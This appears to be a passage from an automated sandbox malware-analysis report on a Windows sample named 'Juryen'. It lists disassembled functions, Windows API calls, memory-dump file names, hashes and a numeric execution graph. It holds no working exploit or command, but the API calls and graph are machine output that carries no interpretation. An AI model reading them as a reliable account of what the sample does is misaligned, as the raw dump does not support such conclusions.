                                                                    • GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,00000000,0040351A,00436000,00436800,00436800,00436800,00436800,00436800,00436800,00403806), ref: 00406099
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2512911969.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2512838969.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2512979332.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2513040085.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2513128679.000000000044D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: CountFileNameTempTick
                                                                    • String ID: nsa
                                                                    • API String ID: 1716503409-2209301699
                                                                    • Opcode ID: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
                                                                    • Instruction ID: 6ac4114a0c6328616d68196ae331b9967fc339ed7b26ce04d623ba2336a1d7a6
                                                                    • Opcode Fuzzy Hash: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
                                                                    • Instruction Fuzzy Hash: D4F09076B40204BBEB00CF69ED05F9FB7ACEB95750F11803AFA01F7180E6B099548768
                                                                    Function 00407094 Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2512911969.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2512838969.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2512979332.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2513040085.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2513128679.000000000044D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2ff22e2e2fe9ce3de78e7ddd3335664d820a6fec416f6b591a6c72a947d9530d
                                                                    • Instruction ID: 57bf2fd90c69a3a2134d3ca1d9604f9a54cf20ddad3feead76618616929b2f58
                                                                    • Opcode Fuzzy Hash: 2ff22e2e2fe9ce3de78e7ddd3335664d820a6fec416f6b591a6c72a947d9530d
                                                                    • Instruction Fuzzy Hash: 17A15471E04229CBDF28CFA8C8546ADBBB1FF44305F10846ED816BB281D7786A86DF45
                                                                    Function 00407295 Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2512911969.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2512838969.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2512979332.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2513040085.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2513128679.000000000044D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0bdb7e84a84856003d11171116f50dfbd9bb9a779b2e7a3e4899fdc47cedc848
                                                                    • Instruction ID: 6b1c66eb9f97b1ade68f1d395623a9ed29f1776dbc94043a645b3c6b65beda35
                                                                    • Opcode Fuzzy Hash: 0bdb7e84a84856003d11171116f50dfbd9bb9a779b2e7a3e4899fdc47cedc848
                                                                    • Instruction Fuzzy Hash: C5912270E04228CBDF28CF98C854BADBBB1FF44305F14816AD856BB281D778A986DF45
                                                                    Function 00406FAB Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2512911969.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2512838969.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2512979332.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2513040085.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2513128679.000000000044D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: be7a598e94a0405de8a772e3f69c54869daecda94b4303a07673bf76e2652f1c
                                                                    • Instruction ID: ce41943af36f178b06a8ef9aeec7331a28cc36c4f565c07526a7a1ecbc0683f6
                                                                    • Opcode Fuzzy Hash: be7a598e94a0405de8a772e3f69c54869daecda94b4303a07673bf76e2652f1c
                                                                    • Instruction Fuzzy Hash: 8C813571E04228CFDF24CFA8C844BADBBB1FB45305F24816AD456BB281D778A986DF45
                                                                    Function 00406AB0 Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2512911969.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2512838969.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2512979332.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2513040085.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2513128679.000000000044D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 32d59b201beac9d8f322f7ad5055b4a277c8e7969ed8db35c8d1fbf5724c7b18
                                                                    • Instruction ID: 8f4657df29e0a6c4f41eae1c6e560b42ebe12933d6c33c39fa024371cffe791d
                                                                    • Opcode Fuzzy Hash: 32d59b201beac9d8f322f7ad5055b4a277c8e7969ed8db35c8d1fbf5724c7b18
                                                                    • Instruction Fuzzy Hash: F4815771E04228DBDF24CFA8C8447ADBBB1FF44315F10816AD856BB281D7786986DF45
                                                                    Function 00406EFE Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2512911969.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2512838969.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2512979332.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2513040085.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2513128679.000000000044D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5ad3ccd1842de9fa96a72a1c56b2a37abd66cddd4bfb2a4aa43cc43f3deb674d
                                                                    • Instruction ID: 467485e0bb60f7ca81b57cb4e762169b1f98b62e9d0b722d18e83a7fcf81438f
                                                                    • Opcode Fuzzy Hash: 5ad3ccd1842de9fa96a72a1c56b2a37abd66cddd4bfb2a4aa43cc43f3deb674d
                                                                    • Instruction Fuzzy Hash: 04711375E04228CBDF24CFA8C844BADBBF1FB48305F15806AD856B7281D778A986DF45
                                                                    Function 0040701C Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2512911969.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2512838969.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2512979332.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2513040085.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2513128679.000000000044D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 702cc36666a341df00ed023e166d9505421316bb70e071c2ca241f15019959e6
                                                                    • Instruction ID: 8594309fab6a939f8579025671b20e25c27ad2f20b93bd04310bc8f9388019e2
                                                                    • Opcode Fuzzy Hash: 702cc36666a341df00ed023e166d9505421316bb70e071c2ca241f15019959e6
                                                                    • Instruction Fuzzy Hash: A6713471E04228CBDF28CF98C844BADBBB1FF45305F14806AD816BB281D778A986DF45
                                                                    Function 00406F68 Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2512911969.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2512838969.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2512979332.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2513040085.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2513128679.000000000044D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 97fac772243d771687d70cd7bd51d4e603ca3fb4096038018fdbee07d45d8760
                                                                    • Instruction ID: 804367245b599a5d262e6525417658d62bb0317a144133a249ff79fbb491f744
                                                                    • Opcode Fuzzy Hash: 97fac772243d771687d70cd7bd51d4e603ca3fb4096038018fdbee07d45d8760
                                                                    • Instruction Fuzzy Hash: 04712571E04228CBDF28CF98C854BADBBB1FF44305F15806AD856B7281C778A986DF45
                                                                    Function 00405F96 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040627B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA6
                                                                    • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405FBE
                                                                    • CharNextA.USER32(00000000,?,00000000,0040627B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FCF
                                                                    • lstrlenA.KERNEL32(00000000,?,00000000,0040627B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD8
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2512911969.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2512838969.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2512979332.0000000000408000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2513040085.000000000040A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 0000000B.00000002.2513128679.000000000044D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: lstrlen$CharNextlstrcmpi
                                                                    • String ID:
                                                                    • API String ID: 190613189-0
                                                                    • Opcode ID: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
                                                                    • Instruction ID: c3aaa261a9e4bb9915bd58c77e7651ea6c0a11e303954dac61c17192ece284d7
                                                                    • Opcode Fuzzy Hash: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
                                                                    • Instruction Fuzzy Hash: F7F06231105459EFDB029BA5DD00D9EBBA8EF15254B2540BAE840F7250D678DE019B69

                                                                    Execution Graph

                                                                    Execution Coverage:6.4%
                                                                    Dynamic/Decrypted Code Coverage:9.2%
                                                                    Signature Coverage:3.5%
                                                                    Total number of Nodes:2000
                                                                    Total number of Limit Nodes:110
                                                                    execution_graph 37631 44dea5 37632 44deb5 FreeLibrary 37631->37632 37633 44dec3 37631->37633 37632->37633 37634 4147f3 37637 414561 37634->37637 37636 414813 37638 41456d 37637->37638 37639 41457f GetPrivateProfileIntW 37637->37639 37642 4143f1 memset _itow WritePrivateProfileStringW 37638->37642 37639->37636 37641 41457a 37641->37636 37642->37641 37643 4287c1 37644 4287d2 37643->37644 37647 429ac1 37643->37647 37648 428818 37644->37648 37649 42881f 37644->37649 37658 425711 37644->37658 37645 4259da 37706 416760 11 API calls 37645->37706 37677 425ad6 37647->37677 37713 415c56 11 API calls 37647->37713 37680 42013a 37648->37680 37708 420244 97 API calls 37649->37708 37651 4260dd 37707 424251 120 API calls 37651->37707 37654 4259c2 37654->37677 37700 415c56 11 API calls 37654->37700 37658->37645 37658->37647 37658->37654 37661 429a4d 37658->37661 37664 422aeb memset memcpy memcpy 37658->37664 37668 4260a1 37658->37668 37676 425a38 37658->37676 37696 4227f0 memset memcpy 37658->37696 37697 422b84 15 API calls 37658->37697 37698 422b5d memset memcpy memcpy 37658->37698 37699 422640 13 API calls 37658->37699 37701 4241fc 11 API calls 37658->37701 37702 42413a 90 API calls 37658->37702 37662 429a66 37661->37662 37663 429a9b 37661->37663 37709 415c56 11 API calls 37662->37709 37667 429a96 37663->37667 37711 416760 11 API calls 37663->37711 37664->37658 37712 424251 120 API calls 37667->37712 37705 415c56 11 API calls 37668->37705 37670 429a7a 37710 416760 11 API calls 37670->37710 37676->37654 37703 422640 13 API calls 37676->37703 37704 4226e0 12 API calls 37676->37704 37681 42014c 37680->37681 37684 420151 37680->37684 37723 41e466 97 API calls 37681->37723 37683 420162 37683->37658 37684->37683 37685 4201b3 37684->37685 37686 420229 37684->37686 37687 4201b8 37685->37687 37688 4201dc 37685->37688 37686->37683 37689 41fd5e 86 API calls 37686->37689 37714 41fbdb 37687->37714 37688->37683 37692 4201ff 37688->37692 37720 41fc4c 37688->37720 37689->37683 37692->37683 37695 42013a 97 API calls 37692->37695 37695->37683 37696->37658 37697->37658 37698->37658 37699->37658 37700->37645 37701->37658 37702->37658 37703->37676 37704->37676 37705->37645 37706->37651 37707->37677 37708->37658 37709->37670 37710->37667 37711->37667 37712->37647 37713->37645 37715 41fbf1 37714->37715 37716 41fbf8 37714->37716 37719 41fc39 37715->37719 37738 4446ce 11 API calls 37715->37738 37728 41ee26 37716->37728 37719->37683 37724 41fd5e 37719->37724 37721 41ee6b 86 API calls 37720->37721 37722 41fc5d 37721->37722 37722->37688 37723->37684 37727 41fd65 37724->37727 37725 41fdab 37725->37683 37726 41fbdb 86 API calls 37726->37727 37727->37725 37727->37726 37729 41ee41 37728->37729 37730 41ee32 37728->37730 37739 41edad 37729->37739 37742 4446ce 11 API calls 37730->37742 37733 41ee3c 37733->37715 37736 41ee58 37736->37733 37744 41ee6b 37736->37744 37738->37719 37748 41be52 37739->37748 37742->37733 37743 41eb85 11 API calls 37743->37736 37745 41ee70 37744->37745 37746 41ee78 37744->37746 37804 41bf99 86 API calls 37745->37804 37746->37733 37749 41be6f 37748->37749 37750 41be5f 37748->37750 37755 41be8c 37749->37755 37769 418c63 37749->37769 37783 4446ce 11 API calls 37750->37783 37752 41be69 37752->37733 37752->37743 37755->37752 37756 41bf3a 37755->37756 37758 41bed1 37755->37758 37760 41bee7 37755->37760 37786 4446ce 11 API calls 37756->37786 37759 41bef0 37758->37759 37762 41bee2 37758->37762 37759->37760 37761 41bf01 37759->37761 37760->37752 37787 41a453 86 API calls 37760->37787 37763 41bf24 memset 37761->37763 37765 41bf14 37761->37765 37784 418a6d memset memcpy memset 37761->37784 37773 41ac13 37762->37773 37763->37752 37785 41a223 memset memcpy memset 37765->37785 37768 41bf20 37768->37763 37771 418c72 37769->37771 37770 418c94 37770->37755 37771->37770 37772 418d51 memset memset 37771->37772 37772->37770 37774 41ac3f memset 37773->37774 37775 41ac52 37773->37775 37780 41acd9 37774->37780 37777 41ac6a 37775->37777 37788 41dc14 19 API calls 37775->37788 37778 41aca1 37777->37778 37789 41519d 37777->37789 37778->37780 37781 41acc0 memset 37778->37781 37782 41accd memcpy 37778->37782 37780->37760 37781->37780 37782->37780 37783->37752 37784->37765 37785->37768 37786->37760 37788->37777 37792 4175ed 37789->37792 37800 417570 SetFilePointer 37792->37800 37795 41760a ReadFile 37796 417637 37795->37796 37797 417627 GetLastError 37795->37797 37798 4151b3 37796->37798 37799 41763e memset 37796->37799 37797->37798 37798->37778 37799->37798 37801 41759c GetLastError 37800->37801 37803 4175b2 37800->37803 37802 4175a8 GetLastError 37801->37802 37801->37803 37802->37803 37803->37795 37803->37798 37804->37746 37805 417bc5 37806 417c61 37805->37806 37807 417bda 37805->37807 37807->37806 37808 417bf6 UnmapViewOfFile CloseHandle 37807->37808 37810 417c2c 37807->37810 37812 4175b7 37807->37812 37808->37807 37808->37808 37810->37807 37817 41851e 20 API calls 37810->37817 37813 4175d6 CloseHandle 37812->37813 37814 4175c8 37813->37814 37815 4175df 37813->37815 37814->37815 37816 4175ce Sleep 37814->37816 37815->37807 37816->37813 37817->37810 37818 4152c7 malloc 37819 4152ef 37818->37819 37821 4152e2 37818->37821 37822 416760 11 API calls 37819->37822 37822->37821 37823 4148b6 FindResourceW 37824 4148cf SizeofResource 37823->37824 37827 4148f9 37823->37827 37825 4148e0 LoadResource 37824->37825 37824->37827 37826 4148ee LockResource 37825->37826 37825->37827 37826->37827 37828 415308 free 37829 441b3f 37839 43a9f6 37829->37839 37831 441b61 38012 4386af memset 37831->38012 37833 44189a 37834 442bd4 37833->37834 37835 4418e2 37833->37835 37836 4418ea 37834->37836 38014 441409 memset 37834->38014 37835->37836 38013 4414a9 12 API calls 37835->38013 37840 43aa20 37839->37840 37841 43aadf 37839->37841 37840->37841 37842 43aa34 memset 37840->37842 37841->37831 37843 43aa56 37842->37843 37844 43aa4d 37842->37844 38015 43a6e7 37843->38015 38166 42c02e memset 37844->38166 37849 43aad3 38167 4169a7 11 API calls 37849->38167 37852 43ac18 37854 43ac47 37852->37854 38169 42bbd5 memcpy memcpy memcpy memset memcpy 37852->38169 37855 43aca8 37854->37855 38170 438eed 16 API calls 37854->38170 37859 43acd5 37855->37859 38172 4233ae 11 API calls 37855->38172 37858 43ac87 38171 4233c5 16 API calls 37858->38171 38027 423426 37859->38027 37863 43ace1 38031 439811 37863->38031 37864 43a9f6 161 API calls 37865 43aae5 37864->37865 37865->37841 37865->37852 37865->37864 38168 439bbb 22 API calls 37865->38168 37867 43acfd 37873 43ad2c 37867->37873 38173 438eed 16 API calls 37867->38173 37869 43ad19 38174 4233c5 16 API calls 37869->38174 37871 43ad58 38060 44081d 37871->38060 37873->37871 37875 43add9 37873->37875 37874 423426 11 API calls 37876 43ae3a memset 37874->37876 37875->37874 37875->37875 37877 43ae73 37876->37877 38176 42e1c0 147 API calls 37877->38176 37878 43adab 38099 438c4e 37878->38099 37880 43ad6c 37880->37841 37880->37878 38175 42370b memset memcpy memset 37880->38175 37882 43ae96 38177 42e1c0 147 API calls 37882->38177 37887 43aea8 37888 43aec1 37887->37888 38178 42e199 147 API calls 37887->38178 37890 43af00 37888->37890 38179 42e1c0 147 API calls 37888->38179 37890->37841 37893 43af1a 37890->37893 37894 43b3d9 37890->37894 38180 438eed 16 API calls 37893->38180 37899 43b3f6 37894->37899 37906 43b4c8 37894->37906 37896 43b60f 37896->37841 38156 4393a5 37896->38156 37897 43af2f 38181 4233c5 16 API calls 37897->38181 38215 432878 12 API calls 37899->38215 37901 43af51 37902 423426 11 API calls 37901->37902 37904 43af7d 37902->37904 37908 423426 11 API calls 37904->37908 37905 43b4f2 38222 43a76c 21 API calls 37905->38222 37906->37905 38221 42bbd5 memcpy memcpy memcpy memset memcpy 37906->38221 37912 43af94 37908->37912 37910 43b529 37914 44081d 161 API calls 37910->37914 37911 43b428 37939 43b462 37911->37939 38216 432b60 16 API calls 37911->38216 38182 423330 11 API calls 37912->38182 37917 43b544 37914->37917 37916 43b47e 37919 43b497 37916->37919 38218 42374a memcpy memset memcpy memcpy memcpy 37916->38218 37927 43b55c 37917->37927 38223 42c02e memset 37917->38223 37918 43afca 38183 423330 11 API calls 37918->38183 38219 4233ae 11 API calls 37919->38219 37924 43afdb 38184 4233ae 11 API calls 37924->38184 37926 43b4b1 38220 423399 11 API calls 37926->38220 38224 43a87a 163 API calls 37927->38224 37929 43b56c 37932 43b58a 37929->37932 38225 423330 11 API calls 37929->38225 37931 43afee 37936 44081d 161 API calls 37931->37936 37933 440f84 12 API calls 37932->37933 37938 43b592 37933->37938 37934 43b4c1 38227 42db80 163 API calls 37934->38227 37946 43b005 37936->37946 38226 43a82f 16 API calls 37938->38226 38217 423330 11 API calls 37939->38217 37942 43b5b4 37943 438c4e 161 API calls 37942->37943 37944 43b5cf 37943->37944 38228 42c02e memset 37944->38228 37946->37841 37951 43b01f 37946->37951 38185 42d836 163 API calls 37946->38185 37947 43b1ef 38194 4233c5 16 API calls 37947->38194 37949 43b212 38195 423330 11 API calls 37949->38195 37951->37947 38192 423330 11 API calls 37951->38192 38193 42d71d 163 API calls 37951->38193 37953 43add4 37953->37896 38229 438f86 16 API calls 37953->38229 37956 43b087 38186 4233ae 11 API calls 37956->38186 37957 43b22a 38196 42ccb5 11 API calls 37957->38196 37960 43b10f 38189 423330 11 API calls 37960->38189 37961 43b23f 38197 4233ae 11 API calls 37961->38197 37963 43b257 38198 4233ae 11 API calls 37963->38198 37967 43b129 38190 4233ae 11 API calls 37967->38190 37968 43b26e 38199 4233ae 11 API calls 37968->38199 37970 43b09a 37970->37960 38187 42cc15 19 API calls 37970->38187 38188 4233ae 11 API calls 37970->38188 37972 43b282 38200 43a87a 163 API calls 37972->38200 37974 43b13c 37977 440f84 12 API calls 37974->37977 37976 43b29d 38201 423330 11 API calls 37976->38201 37979 43b15f 37977->37979 38191 4233ae 11 API calls 37979->38191 37980 43b2af 37982 43b2b8 37980->37982 37983 43b2ce 37980->37983 38202 4233ae 11 API calls 37982->38202 37985 440f84 12 API calls 37983->37985 37987 43b2da 37985->37987 37986 43b2c9 38204 4233ae 11 API calls 37986->38204 38203 42370b memset memcpy memset 37987->38203 37990 43b2f9 38205 423330 11 API calls 37990->38205 37992 43b30b 38206 423330 11 API calls 37992->38206 37994 43b325 38207 423399 11 API calls 37994->38207 37996 43b332 38208 4233ae 11 API calls 37996->38208 37998 43b354 38209 423399 11 API calls 37998->38209 38000 43b364 38210 43a82f 16 API calls 38000->38210 38002 43b370 38211 42db80 163 API calls 38002->38211 38004 43b380 38005 438c4e 161 API calls 38004->38005 38006 43b39e 38005->38006 38212 423399 11 API calls 38006->38212 38008 43b3ae 38213 43a76c 21 API calls 38008->38213 38010 43b3c3 38214 423399 11 API calls 38010->38214 38012->37833 38013->37836 38014->37834 38016 43a6f5 38015->38016 38022 43a765 38015->38022 38016->38022 38230 42a115 38016->38230 38020 43a73d 38021 42a115 147 API calls 38020->38021 38020->38022 38021->38022 38022->37841 38023 4397fd 38022->38023 38024 43980c 38023->38024 38025 439804 38023->38025 38024->37841 38024->37849 38024->37865 38515 42324c memset 38025->38515 38028 42343a 38027->38028 38030 42344c 38027->38030 38516 415bbe 11 API calls 38028->38516 38030->37863 38032 439828 38031->38032 38059 439952 38031->38059 38033 4397fd memset 38032->38033 38032->38059 38034 43984c 38033->38034 38035 4398b0 38034->38035 38036 43986b 38034->38036 38034->38059 38519 42d71d 163 API calls 38035->38519 38517 4233ae 11 API calls 38036->38517 38039 4398bd 38520 423399 11 API calls 38039->38520 38040 43987a 38042 439892 38040->38042 38518 423330 11 API calls 38040->38518 38042->38059 38522 42d71d 163 API calls 38042->38522 38043 4398c8 38521 4233ae 11 API calls 38043->38521 38047 4398f5 38523 423399 11 API calls 38047->38523 38049 439902 38524 423399 11 API calls 38049->38524 38051 43990c 38525 423330 11 API calls 38051->38525 38053 43991c 38526 423330 11 API calls 38053->38526 38055 439936 38527 423399 11 API calls 38055->38527 38057 439942 38528 423330 11 API calls 38057->38528 38059->37867 38061 440850 38060->38061 38062 44083e 38060->38062 38064 415a91 memset 38061->38064 38529 4169a7 11 API calls 38062->38529 38065 44087b 38064->38065 38066 44084a 38065->38066 38067 423426 11 API calls 38065->38067 38066->37880 38068 4408a6 memset 38067->38068 38069 44092e 38068->38069 38070 44090c 38068->38070 38531 43e10c memset memcpy 38069->38531 38070->38069 38530 42a003 147 API calls 38070->38530 38073 44093b 38074 440955 38073->38074 38077 440968 38073->38077 38532 42c0c8 147 API calls 38073->38532 38074->38077 38533 42db80 163 API calls 38074->38533 38089 4409d1 38077->38089 38534 43e696 163 API calls 38077->38534 38079 440a01 memset 38079->38089 38081 440d1b 38088 440e28 38081->38088 38537 432878 12 API calls 38081->38537 38083 440f3a 38084 440f50 38083->38084 38083->38088 38084->38066 38548 43fe30 163 API calls 38084->38548 38085 440e1c 38538 4169a7 11 API calls 38085->38538 38539 440799 38088->38539 38089->38079 38089->38081 38089->38085 38089->38088 38535 43f37c 14 API calls 38089->38535 38536 43f524 18 API calls __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 38089->38536 38095 440d6a 38095->38083 38097 4233c5 16 API calls 38095->38097 38543 435f88 17 API calls 38095->38543 38544 42374a memcpy memset memcpy memcpy memcpy 38095->38544 38545 43ee22 23 API calls 38095->38545 38546 432b60 16 API calls 38095->38546 38547 432878 12 API calls 38095->38547 38097->38095 38100 438ee5 38099->38100 38101 438c78 38099->38101 38146 440f84 38100->38146 38104 438c97 38101->38104 38550 438bb0 11 API calls 38101->38550 38103 438cdb 38105 438d0c 38103->38105 38552 438bfd 16 API calls 38103->38552 38104->38103 38551 42d836 163 API calls 38104->38551 38106 438eb1 38105->38106 38107 438d1f 38105->38107 38565 423330 11 API calls 38106->38565 38111 438d41 38107->38111 38113 438e6a 38107->38113 38114 438d2d 38107->38114 38115 438e80 38111->38115 38116 438d54 38111->38116 38129 438d77 38111->38129 38120 438e70 38113->38120 38121 438e18 38113->38121 38118 438d36 38114->38118 38119 438dfa 38114->38119 38122 438e96 38115->38122 38123 438e88 38115->38123 38553 423330 11 API calls 38116->38553 38118->38111 38118->38129 38130 438d7c 38118->38130 38119->38121 38133 438e2a 38119->38133 38562 42ccb5 11 API calls 38120->38562 38559 438aa3 163 API calls 38121->38559 38564 4233ae 11 API calls 38122->38564 38563 423399 11 API calls 38123->38563 38129->38100 38566 423330 11 API calls 38129->38566 38555 423330 11 API calls 38130->38555 38131 438d6a 38554 438aa3 163 API calls 38131->38554 38560 4233c5 16 API calls 38133->38560 38137 438d92 38139 438d9b 38137->38139 38141 438dad 38137->38141 38138 438e44 38561 4233ae 11 API calls 38138->38561 38556 438aa3 163 API calls 38139->38556 38557 4233ae 11 API calls 38141->38557 38144 438dc4 38558 423330 11 API calls 38144->38558 38152 440fa7 38146->38152 38147 441223 38148 440799 memset 38147->38148 38149 441242 38148->38149 38149->37953 38150 423399 11 API calls 38154 441105 38150->38154 38151 423399 11 API calls 38151->38152 38152->38151 38153 4233ae 11 API calls 38152->38153 38152->38154 38567 423330 11 API calls 38152->38567 38153->38152 38154->38147 38154->38150 38157 4393c7 38156->38157 38158 4394db 38156->38158 38157->38158 38568 423c8d 38157->38568 38158->37841 38160 4394d0 38575 439351 15 API calls 38160->38575 38164 4393fd 38164->38160 38165 4165ff 11 API calls 38164->38165 38573 415be9 memcpy 38164->38573 38574 423ce4 15 API calls 38164->38574 38165->38164 38166->37843 38167->37841 38168->37865 38169->37854 38170->37858 38171->37855 38172->37859 38173->37869 38174->37873 38175->37878 38176->37882 38177->37887 38178->37888 38179->37888 38180->37897 38181->37901 38182->37918 38183->37924 38184->37931 38185->37956 38186->37970 38187->37970 38188->37970 38189->37967 38190->37974 38191->37951 38192->37951 38193->37951 38194->37949 38195->37957 38196->37961 38197->37963 38198->37968 38199->37972 38200->37976 38201->37980 38202->37986 38203->37986 38204->37990 38205->37992 38206->37994 38207->37996 38208->37998 38209->38000 38210->38002 38211->38004 38212->38008 38213->38010 38214->37953 38215->37911 38216->37939 38217->37916 